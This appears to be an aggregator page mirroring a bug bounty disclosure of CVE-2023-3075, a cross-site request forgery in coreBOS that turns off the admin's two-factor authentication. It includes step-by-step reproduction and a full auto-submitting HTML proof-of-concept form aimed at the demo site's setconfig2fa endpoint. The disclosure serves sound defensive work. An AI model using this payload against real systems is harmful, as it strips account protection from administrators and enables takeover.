Lucene search
7h3h4ckv1570F5448A6-D551-424F-887D-80F9BCFAA6E4HistorySep 01, 2022 - 4:08 p.m.
Attacker can turn off 2FA of the Admin
2022-09-0116:08:35
7h3h4ckv157
www.huntr.dev
6
csrf attack
admin 2fa
bug bounty
0.001 Low
EPSS
Percentile
27.0%
Description
The attacker can turn off the 2FA of the admin by performing the CSRF attack
Steps to reproduce
Step 1: Login as admin on the demo product and navigate to https://demo.corebos.com/index.php?module=Utilities&action=integration&_op=getconfig2fa&user_list=1
Step 2: Turn on the 2FA and close the tab
Step 3: Reopen the account 2fa section –> and verify it’s still on
Step 4: Close the Tab again
Step 5: Open w3schools –> HTML editor on new tab
Step 6: Copy this code and Run
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.corebos.com/index.php">
<meta name="referrer" content="no-referrer">
<input type="hidden" name="module" value="Utilities" />
<input type="hidden" name="action" value="integration" />
<input type="hidden" name="_op" value="setconfig2fa" />
<input type="hidden" name="user_list" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Step 7: Done
Successfully launched CSRF attack & 2FA of Admin turned off!
Related
prion
prion
Cross site request forgery (csrf)
2023-06-02 18:15:00
nvd
nvd
CVE-2023-3075
2023-06-02 18:15:09
cve
cve
CVE-2023-3075
2023-06-02 18:15:09
osv
osv
CVE-2023-3075
2023-06-02 18:15:09
cvelist
cvelist
CVE-2023-3075 Cross-Site Request Forgery (CSRF) in tsolucio/corebos
2023-06-02 00:00:00